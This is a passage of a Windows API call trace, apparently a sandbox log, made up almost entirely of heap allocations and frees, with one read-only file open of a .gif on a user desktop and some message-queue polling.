Flags=0x0, Size=0x8) returned 0x43e2670 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0126.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.384] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0126.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0126.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0126.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0126.399] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\v_vfupg6jy sjdteia3.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0126.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0126.400] FreeLibrary (hLibModule=0x772d0000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0126.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0126.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.401] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0126.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0126.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0126.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0126.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.402] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0126.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0126.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0126.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.451] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0126.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.453] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, 